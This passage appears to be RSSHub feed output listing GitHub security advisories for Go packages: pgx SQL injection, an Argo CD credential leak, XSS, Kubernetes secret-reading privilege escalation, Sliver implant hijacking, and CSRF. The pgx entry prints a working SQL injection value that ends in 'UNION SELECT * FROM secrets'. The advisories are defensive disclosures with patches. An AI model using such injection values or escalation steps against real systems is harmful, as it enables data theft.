<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/admin-ui-classic-bundle] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
</channel>
</rss> ... |
http://localhost:1200/github-advisor/data/go - Success ✔️<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - go</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github-advisor/data/go" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - go - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Fri, 13 Sep 2024 16:32:37 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>[github.com/jackc/pgproto3/v2] pgproto3 SQL Injection via Protocol Message Size Overflow</title>
<description><h3 id="impact">Impact</h3>
<p>SQL injection can occur if an attacker can cause a single query or bind message to exceed 4 GB in size. An integer overflow in the calculated message size can cause the one large message to be sent as multiple messages under the attacker's control.</p>
<h3 id="patches">Patches</h3>
<p>The problem is resolved in v2.3.3</p>
<h3 id="workarounds">Workarounds</h3>
<p>Reject user input large enough to cause a single query or bind message to exceed 4 GB in size.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8">https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-27304">https://nvd.nist.gov/vuln/detail/CVE-2024-27304</a></li>
<li><a href="https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007">https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007</a></li>
<li><a href="https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv">https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv</a></li>
<li><a href="https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4">https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4</a></li>
<li><a href="https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8">https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8</a></li>
<li><a href="https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df">https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df</a></li>
<li><a href="https://github.com/advisories/GHSA-7jwh-3vrq-q3m8">https://github.com/advisories/GHSA-7jwh-3vrq-q3m8</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-7jwh-3vrq-q3m8</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-7jwh-3vrq-q3m8</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/jackc/pgx/v5] pgx SQL Injection via Protocol Message Size Overflow</title>
<description><h3 id="impact">Impact</h3>
<p>SQL injection can occur if an attacker can cause a single query or bind message to exceed 4 GB in size. An integer overflow in the calculated message size can cause the one large message to be sent as multiple messages under the attacker's control.</p>
<h3 id="patches">Patches</h3>
<p>The problem is resolved in v4.18.2 and v5.5.4.</p>
<h3 id="workarounds">Workarounds</h3>
<p>Reject user input large enough to cause a single query or bind message to exceed 4 GB in size.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8">https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8</a></li>
<li><a href="https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv">https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv</a></li>
<li><a href="https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007">https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007</a></li>
<li><a href="https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4">https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4</a></li>
<li><a href="https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8">https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8</a></li>
<li><a href="https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df">https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df</a></li>
<li><a href="https://github.com/advisories/GHSA-mrww-27vc-gghv">https://github.com/advisories/GHSA-mrww-27vc-gghv</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mrww-27vc-gghv</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mrww-27vc-gghv</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/jackc/pgx/v4] pgx SQL Injection via Protocol Message Size Overflow</title>
<description><h3 id="impact">Impact</h3>
<p>SQL injection can occur if an attacker can cause a single query or bind message to exceed 4 GB in size. An integer overflow in the calculated message size can cause the one large message to be sent as multiple messages under the attacker's control.</p>
<h3 id="patches">Patches</h3>
<p>The problem is resolved in v4.18.2 and v5.5.4.</p>
<h3 id="workarounds">Workarounds</h3>
<p>Reject user input large enough to cause a single query or bind message to exceed 4 GB in size.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8">https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8</a></li>
<li><a href="https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv">https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv</a></li>
<li><a href="https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007">https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007</a></li>
<li><a href="https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4">https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4</a></li>
<li><a href="https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8">https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8</a></li>
<li><a href="https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df">https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df</a></li>
<li><a href="https://github.com/advisories/GHSA-mrww-27vc-gghv">https://github.com/advisories/GHSA-mrww-27vc-gghv</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mrww-27vc-gghv</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mrww-27vc-gghv</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/jackc/pgx/v4] pgx SQL Injection via Line Comment Creation</title>
<description><h3 id="impact">Impact</h3>
<p>SQL injection can occur when all of the following conditions are met:</p>
<ol>
<li>The non-default simple protocol is used.</li>
<li>A placeholder for a numeric value must be immediately preceded by a minus.</li>
<li>There must be a second placeholder for a string value after the first placeholder; both
must be on the same line.</li>
<li>Both parameter values must be user-controlled.</li>
</ol>
<p>e.g. </p>
<p>Simple mode must be enabled:</p>
<pre><code class="language-go">// connection string includes "prefer_simple_protocol=true"
// or
// directly enabled in code
config.ConnConfig.PreferSimpleProtocol = true
</code></pre>
<p>Parameterized query:</p>
<pre><code class="language-sql">SELECT * FROM example WHERE result=-$1 OR name=$2;
</code></pre>
<p>Parameter values:</p>
<p><code>$1</code> =&gt; <code>-42</code>
<code>$2</code> =&gt; <code>"foo\n 1 AND 1=0 UNION SELECT * FROM secrets; --"</code></p>
<p>Resulting query after preparation:</p>
<pre><code class="language-sql">SELECT * FROM example WHERE result=--42 OR name= 'foo
1 AND 1=0 UNION SELECT * FROM secrets; --';
</code></pre>
<h3 id="patches">Patches</h3>
<p>The problem is resolved in v4.18.2.</p>
<h3 id="workarounds">Workarounds</h3>
<p>Do not use the simple protocol or do not place a minus directly before a placeholder.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/jackc/pgx/security/advisories/GHSA-m7wr-2xf7-cm9p">https://github.com/jackc/pgx/security/advisories/GHSA-m7wr-2xf7-cm9p</a></li>
<li><a href="https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df">https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df</a></li>
<li><a href="https://github.com/advisories/GHSA-m7wr-2xf7-cm9p">https://github.com/advisories/GHSA-m7wr-2xf7-cm9p</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-m7wr-2xf7-cm9p</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-m7wr-2xf7-cm9p</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/argoproj/argo-cd/v2] Argo CD leaks repository credentials in user-facing error messages and in logs</title>
<description><h3 id="impact">Impact</h3>
<p>All versions of Argo CD starting with v2.6.0-rc1 have an output sanitization bug which leaks repository access credentials in error messages. These error messages are visible to the user, and they are logged. The error message is visible when a user attempts to create or update an Application via the Argo CD API (and therefore the UI or CLI). The user must have <code>applications, create</code> or <code>applications, update</code> RBAC access to reach the code which may produce the error.</p>
<p>The user is not guaranteed to be able to trigger the error message. They may attempt to spam the API with requests to trigger a rate limit error from the upstream repository. </p>
<p>If the user has <code>repositories, update</code> access, they may edit an existing repository to introduce a URL typo or otherwise force an error message. But if they have that level of access, they are probably intended to have access to the credentials anyway.</p>
<h3 id="patches">Patches</h3>
<p>A patch for this vulnerability has been released in the following Argo CD version:</p>
<ul>
<li>v2.6.1</li>
</ul>
<h3 id="workarounds">Workarounds</h3>
<p>The only way to completely resolve the issue is to upgrade.</p>
<h4 id="mitigations">Mitigations</h4>
<p>To mitigate the issue, make sure that your repo credentials have only least necessary privileges. For example, the credentials should not have push access, and they should not have access to more resources than what Argo CD actually needs (for example, a whole GitHub org when only one repo is needed).</p>
<p>To further mitigate the impact of a leaked write-capable repo credential, you could <a href="https://argo-cd.readthedocs.io/en/stable/user-guide/gpg-verification/#enforcing-signature-verification">enable commit signature verification</a>. Even if someone could push a malicious commit, the commit would not be synced.</p>
<p>You should also enforce least privileges in Argo CD RBAC. Make sure users only have <code>repositories, update</code>, <code>applications, update</code>, or <code>applications, create</code> access if they absolutely need it.</p>
<h3 id="references">References</h3>
<ul>
<li>The problem was initially reported in a <a href="https://github.com/argoproj/argo-cd/issues/12309">GitHub issue</a></li>
<li><a href="https://argo-cd.readthedocs.io/en/stable/operator-manual/rbac/">Argo CD RBAC configuration documentation</a></li>
</ul>
<h3 id="for-more-information">For more information</h3>
<ul>
<li>Open an issue in <a href="https://github.com/argoproj/argo-cd/issues">the Argo CD issue tracker</a> or <a href="https://github.com/argoproj/argo-cd/discussions">discussions</a></li>
<li>Join us on <a href="https://argoproj.github.io/community/join-slack">Slack</a> in channel #argo-cd</li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/argoproj/argo-cd/security/advisories/GHSA-mv6w-j4xc-qpfw">https://github.com/argoproj/argo-cd/security/advisories/GHSA-mv6w-j4xc-qpfw</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-25163">https://nvd.nist.gov/vuln/detail/CVE-2023-25163</a></li>
<li><a href="https://github.com/argoproj/argo-cd/issues/12309">https://github.com/argoproj/argo-cd/issues/12309</a></li>
<li><a href="https://github.com/argoproj/argo-cd/pull/12320">https://github.com/argoproj/argo-cd/pull/12320</a></li>
<li><a href="https://pkg.go.dev/vuln/GO-2023-1548">https://pkg.go.dev/vuln/GO-2023-1548</a></li>
<li><a href="https://argo-cd.readthedocs.io/en/stable/operator-manual/rbac">https://argo-cd.readthedocs.io/en/stable/operator-manual/rbac</a></li>
<li><a href="https://github.com/advisories/GHSA-mv6w-j4xc-qpfw">https://github.com/advisories/GHSA-mv6w-j4xc-qpfw</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mv6w-j4xc-qpfw</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mv6w-j4xc-qpfw</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/gouniverse/cms] Gouniverse GoLang CMS vulnerable to Cross-site Scripting</title>
<description><p>A vulnerability was found in Gouniverse GoLang CMS 1.4.0. It has been declared as problematic. This vulnerability affects the function PageRenderHtmlByAlias of the file FrontendHandler.go. The manipulation of the argument alias leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.4.1 is able to address this issue. The patch is identified as 3e661cdfb4beeb9fe2ad507cdb8104c0b17d072c. It is recommended to upgrade the affected component.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8572">https://nvd.nist.gov/vuln/detail/CVE-2024-8572</a></li>
<li><a href="https://github.com/gouniverse/cms/issues/5">https://github.com/gouniverse/cms/issues/5</a></li>
<li><a href="https://github.com/gouniverse/cms/issues/5#issuecomment-2330848731">https://github.com/gouniverse/cms/issues/5#issuecomment-2330848731</a></li>
<li><a href="https://github.com/gouniverse/cms/commit/3e661cdfb4beeb9fe2ad507cdb8104c0b17d072c">https://github.com/gouniverse/cms/commit/3e661cdfb4beeb9fe2ad507cdb8104c0b17d072c</a></li>
<li><a href="https://github.com/gouniverse/cms/releases/tag/v1.4.1">https://github.com/gouniverse/cms/releases/tag/v1.4.1</a></li>
<li><a href="https://vuldb.com/?ctiid.276802">https://vuldb.com/?ctiid.276802</a></li>
<li><a href="https://vuldb.com/?id.276802">https://vuldb.com/?id.276802</a></li>
<li><a href="https://vuldb.com/?submit.401896">https://vuldb.com/?submit.401896</a></li>
<li><a href="https://github.com/advisories/GHSA-pv7h-hg6m-82j8">https://github.com/advisories/GHSA-pv7h-hg6m-82j8</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-pv7h-hg6m-82j8</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-pv7h-hg6m-82j8</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/external-secrets/external-secrets] External Secrets Operator vulnerable to privilege escalation</title>
<description><h3 id="details">Details</h3>
<p>The external-secrets has a deployment called default-external-secrets-cert-controller, which is bound with a same-name ClusterRole. This ClusterRole has "get/list" verbs of secrets resources (<a href="https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L49">https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L49</a>). It also has patch/update verbs of validatingwebhookconfigurations resources (<a href="https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L27">https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L27</a>). As a result, if a malicious user can access the worker node which has this deployment, he/she can:</p>
<ol>
<li><p>For the "get/list secrets" permission, he/she can abuse the SA token of this deployment to retrieve or get ALL secrets in the whole cluster, including the cluster-admin secret if created. After that, he/she can abuse the cluster-admin secret to do whatever he/she likes to the whole cluster, resulting in a cluster-level privilege escalation.</p>
</li>
<li><p>For the patch/update verb of validatingwebhookconfigurations, the malicious user can abuse these permissions to get sensitive data or launch DoS attacks:</p>
</li>
</ol>
<p>For the privilege escalation attack, by updating/patching a Webhook to make it listen to Secret update operations, the attacker can capture and log all data from requests attempting to update Secrets. More specifically, when a Secret is updated, this Webhook sends the request data to the logging-service, which can then log the content of the Secret. This way, an attacker could indirectly gain access to the full contents of the Secret.</p>
<p>For the DoS attack, by updating/patching a Webhook, and making it deny all Pod create and update requests, the attacker can prevent any new Pods from being created or existing Pods from being updated, resulting in a Denial of Service (DoS) attack.</p>
<h3 id="poc">PoC</h3>
<p>Please see the "Details" section</p>
<h3 id="impact">Impact</h3>
<p>Privilege escalation</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/external-secrets/external-secrets/security/advisories/GHSA-qwgc-rr35-h4x9">https://github.com/external-secrets/external-secrets/security/advisories/GHSA-qwgc-rr35-h4x9</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45041">https://nvd.nist.gov/vuln/detail/CVE-2024-45041</a></li>
<li><a href="https://github.com/external-secrets/external-secrets/commit/0368b9806f660fa6bc52cbbf3c6ccdb27c58bb35">https://github.com/external-secrets/external-secrets/commit/0368b9806f660fa6bc52cbbf3c6ccdb27c58bb35</a></li>
<li><a href="https://github.com/external-secrets/external-secrets/commit/428a452fd2ad45935312f2c2c0d40bc37ce6e67c">https://github.com/external-secrets/external-secrets/commit/428a452fd2ad45935312f2c2c0d40bc37ce6e67c</a></li>
<li><a href="https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L27">https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L27</a></li>
<li><a href="https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L49">https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L49</a></li>
<li><a href="https://github.com/advisories/GHSA-qwgc-rr35-h4x9">https://github.com/advisories/GHSA-qwgc-rr35-h4x9</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-qwgc-rr35-h4x9</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-qwgc-rr35-h4x9</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/bishopfox/sliver] Sliver vulnerable to MitM attack against implants due to a cryptography vulnerability</title>
<description><h3 id="summary">Summary</h3>
<p>The current cryptography implementation in Sliver up to version 1.5.39 allows a MitM with access to the corresponding implant binary to execute arbitrary code on implanted devices via intercepted and crafted responses. (Reserved CVE ID: CVE-2023-34758)</p>
<h3 id="details">Details</h3>
<p>Please see <a href="https://github.com/tangent65536/Slivjacker">the PoC repo</a>.</p>
<h3 id="poc">PoC</h3>
<p>Please also see <a href="https://github.com/tangent65536/Slivjacker">the PoC repo</a>.
To set up a simple PoC environment, </p>
<ol>
<li>Generate an implant with its C2 set to the PoC server's address and copy the embedded private implant key and public server key into the config json. </li>
<li>Run the implant on a separate VM and a <code>notepad.exe</code> window should pop up on the implanted VM.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>A successful attack grants the attacker permission to execute arbitrary code on the implanted device. </p>
<h3 id="references">References</h3>
<p><a href="https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/implant.go">https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/implant.go</a><br><a href="https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/crypto.go">https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/crypto.go</a><br><a href="https://github.com/tangent65536/Slivjacker">https://github.com/tangent65536/Slivjacker</a> </p>
<h3 id="credits">Credits</h3>
<p><a href="https://github.com/tangent65536">Ting-Wei Hsieh</a> from <a href="https://www.chtsecurity.com/?lang=en">CHT Security Co. Ltd.</a></p>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/BishopFox/sliver/security/advisories/GHSA-8jxm-xp43-qh3q">https://github.com/BishopFox/sliver/security/advisories/GHSA-8jxm-xp43-qh3q</a></li>
<li><a href="https://github.com/BishopFox/sliver/commit/2d1ea6192cac2ff9d6450b2d96043fdbf8561516">https://github.com/BishopFox/sliver/commit/2d1ea6192cac2ff9d6450b2d96043fdbf8561516</a></li>
<li><a href="https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/crypto.go">https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/crypto.go</a></li>
<li><a href="https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/implant.go">https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/implant.go</a></li>
<li><a href="https://github.com/BishopFox/sliver/releases/tag/v1.5.40">https://github.com/BishopFox/sliver/releases/tag/v1.5.40</a></li>
<li><a href="https://github.com/tangent65536/Slivjacker">https://github.com/tangent65536/Slivjacker</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-35170">https://nvd.nist.gov/vuln/detail/CVE-2023-35170</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-34758">https://nvd.nist.gov/vuln/detail/CVE-2023-34758</a></li>
<li><a href="https://www.chtsecurity.com/news/04f41dcc-1851-463c-93bc-551323ad8091">https://www.chtsecurity.com/news/04f41dcc-1851-463c-93bc-551323ad8091</a></li>
<li><a href="https://pkg.go.dev/vuln/GO-2023-1866">https://pkg.go.dev/vuln/GO-2023-1866</a></li>
<li><a href="https://github.com/advisories/GHSA-8jxm-xp43-qh3q">https://github.com/advisories/GHSA-8jxm-xp43-qh3q</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-8jxm-xp43-qh3q</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-8jxm-xp43-qh3q</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/osrg/gobgp/v3] Buffer Overflow vulnerability in osrg gobgp</title>
<description><p>Buffer Overflow vulnerability in osrg gobgp commit 419c50dfac578daa4d11256904d0dc182f1a9b22 allows a remote attacker to cause a denial of service via the handlingError function in pkg/server/fsm.go.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-46565">https://nvd.nist.gov/vuln/detail/CVE-2023-46565</a></li>
<li><a href="https://github.com/osrg/gobgp/issues/2725">https://github.com/osrg/gobgp/issues/2725</a></li>
<li><a href="https://github.com/osrg/gobgp/commit/419c50dfac578daa4d11256904d0dc182f1a9b22">https://github.com/osrg/gobgp/commit/419c50dfac578daa4d11256904d0dc182f1a9b22</a></li>
<li><a href="https://github.com/advisories/GHSA-6rqv-5cg7-m4x3">https://github.com/advisories/GHSA-6rqv-5cg7-m4x3</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6rqv-5cg7-m4x3</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6rqv-5cg7-m4x3</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/gitpod-io/gitpod] github.com/gitpod-io/gitpod vulnerable to Cookie Tossing</title>
<description><p>Versions of the package github.com/gitpod-io/gitpod/components/server/go/pkg/lib before main-gha.27122; versions of the package github.com/gitpod-io/gitpod/components/ws-proxy/pkg/proxy before main-gha.27122; versions of the package github.com/gitpod-io/gitpod/install/installer/pkg/components/auth before main-gha.27122; versions of the package github.com/gitpod-io/gitpod/install/installer/pkg/components/public-api-server before main-gha.27122; versions of the package github.com/gitpod-io/gitpod/install/installer/pkg/components/server before main-gha.27122; versions of the package @gitpod/gitpod-protocol before 0.1.5-main-gha.27122 are vulnerable to Cookie Tossing due to a missing __Host- prefix on the <em>gitpod_io_jwt2</em> session cookie. This allows an adversary who controls a subdomain to set the value of the cookie on the Gitpod control plane, which can be assigned to an attacker’s own JWT so that specific actions taken by the victim (such as connecting a new Github organization) are actioned by the attackers session.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21583">https://nvd.nist.gov/vuln/detail/CVE-2024-21583</a></li>
<li><a href="https://github.com/gitpod-io/gitpod/pull/19973">https://github.com/gitpod-io/gitpod/pull/19973</a></li>
<li><a href="https://github.com/gitpod-io/gitpod/commit/da1053e1013f27a56e6d3533aa251dbd241d0155">https://github.com/gitpod-io/gitpod/commit/da1053e1013f27a56e6d3533aa251dbd241d0155</a></li>
<li><a href="https://app.safebase.io/portal/71ccd717-aa2d-4a1e-942e-c768d37e9e0c/preview?product=%5B%E2%80%A6%5D942e-c768d37e9e0c&amp;tcuUid=1d505bda-9a38-4ca5-8724-052e6337f34d">https://app.safebase.io/portal/71ccd717-aa2d-4a1e-942e-c768d37e9e0c/preview?product=%5B%E2%80%A6%5D942e-c768d37e9e0c&amp;tcuUid=1d505bda-9a38-4ca5-8724-052e6337f34d</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODCOMPONENTSSERVERGOPKGLIB-7452074">https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODCOMPONENTSSERVERGOPKGLIB-7452074</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODCOMPONENTSWSPROXYPKGPROXY-7452075">https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODCOMPONENTSWSPROXYPKGPROXY-7452075</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODINSTALLINSTALLERPKGCOMPONENTSAUTH-7452076">https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODINSTALLINSTALLERPKGCOMPONENTSAUTH-7452076</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODINSTALLINSTALLERPKGCOMPONENTSPUBLICAPISERVER-7452077">https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODINSTALLINSTALLERPKGCOMPONENTSPUBLICAPISERVER-7452077</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODINSTALLINSTALLERPKGCOMPONENTSSERVER-7452078">https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODINSTALLINSTALLERPKGCOMPONENTSSERVER-7452078</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-JS-GITPODGITPODPROTOCOL-7452079">https://security.snyk.io/vuln/SNYK-JS-GITPODGITPODPROTOCOL-7452079</a></li>
<li><a href="https://pkg.go.dev/vuln/GO-2024-2997">https://pkg.go.dev/vuln/GO-2024-2997</a></li>
<li><a href="https://github.com/advisories/GHSA-8pgc-65mj-53h5">https://github.com/advisories/GHSA-8pgc-65mj-53h5</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-8pgc-65mj-53h5</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-8pgc-65mj-53h5</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/windmill-labs/windmill] Windmill HTTP Request users.rs excessive authentication in github.com/windmill-labs/windmill</title>
<description><p>A vulnerability was found in Windmill 1.380.0. It has been classified as problematic. Affected is an unknown function of the file backend/windmill-api/src/users.rs of the component HTTP Request Handler. The manipulation leads to improper restriction of excessive authentication attempts. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. Upgrading to version 1.390.1 is able to address this issue. The patch is identified as acfe7786152f036f2476f93ab5536571514fa9e3. It is recommended to upgrade the affected component.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8462">https://nvd.nist.gov/vuln/detail/CVE-2024-8462</a></li>
<li><a href="https://github.com/windmill-labs/windmill/commit/acfe7786152f036f2476f93ab5536571514fa9e3">https://github.com/windmill-labs/windmill/commit/acfe7786152f036f2476f93ab5536571514fa9e3</a></li>
<li><a href="https://github.com/windmill-labs/windmill/releases/tag/v1.390.1">https://github.com/windmill-labs/windmill/releases/tag/v1.390.1</a></li>
<li><a href="https://vuldb.com/?ctiid.276630">https://vuldb.com/?ctiid.276630</a></li>
<li><a href="https://vuldb.com/?id.276630">https://vuldb.com/?id.276630</a></li>
<li><a href="https://vuldb.com/?submit.401826">https://vuldb.com/?submit.401826</a></li>
<li><a href="https://pkg.go.dev/vuln/GO-2024-3118">https://pkg.go.dev/vuln/GO-2024-3118</a></li>
<li><a href="https://github.com/advisories/GHSA-g6q4-w3j3-jfc4">https://github.com/advisories/GHSA-g6q4-w3j3-jfc4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-g6q4-w3j3-jfc4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-g6q4-w3j3-jfc4</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/goharbor/harbor] Cross-site Request Forgery (CSRF) in Cloud Native Computing Foundation Harbor</title>
<description><p>Cure53 has discovered that the Harbor web interface does not implement protection mechanisms against Cross-Site Request Forgery (CSRF). By luring an authenticated user onto a prepared third-party website, an attacker can execute any action on the platform in the context of the currently authenticated victim.</p>
